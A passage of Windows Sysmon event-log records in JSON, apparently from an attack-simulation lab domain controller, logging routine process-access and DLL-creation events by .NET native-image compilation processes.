C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.865","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-00106D451000}","TargetProcessId":"4040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:04","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8125,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:04.881\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22A8-5F25-0000-00106D451000}\r\nTargetProcessId: 4040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:04.881","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22A8-5F25-0000-00106D451000}","TargetProcessId":"4040","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:05","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8126,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:06.225\r\nProcessGuid: {41C8662E-22A8-5F25-0000-00106D451000}\r\nProcessId: 4040\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\fc8-0\\System.Web.Extensions.dll\r\nCreationUtcTime: 2020-08-01 08:07:06.225","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:06.225","ProcessGuid":"{41C8662E-22A8-5F25-0000-00106D451000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\fc8-0\\System.Web.Extensions.dll","CreationUtcTime":"2020-08-01 08:07:06.225","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8127,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:06.303\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010B94C1000}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:06.303","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010B94C1000}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8128,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:06.303\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2336\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010B94C1000}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:06.303","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2336","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010B94C1000}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8129,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:06.318\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010B94C1000}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:06.318","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010B94C1000}","TargetProcessId":"3264","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8130,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:06.865\r\nProcessGuid: {41C8662E-22AA-5F25-0000-0010B94C1000}\r\nProcessId: 3264\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cc0-0\\System.Web.DynamicData.dll\r\nCreationUtcTime: 2020-08-01 08:07:06.865","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:06.865","ProcessGuid":"{41C8662E-22AA-5F25-0000-0010B94C1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cc0-0\\System.Web.DynamicData.dll","CreationUtcTime":"2020-08-01 08:07:06.865","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8131,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:06.912\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 3780\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010CC511000}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:06.912","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"3780","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010CC511000}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8132,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:06.912\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1148\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010CC511000}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:06.912","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"1148","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010CC511000}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:06","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8133,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:06.912\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22AA-5F25-0000-0010CC511000}\r\nTargetProcessId: 4200\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:06.912","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22AA-5F25-0000-0010CC511000}","TargetProcessId":"4200","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:07","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
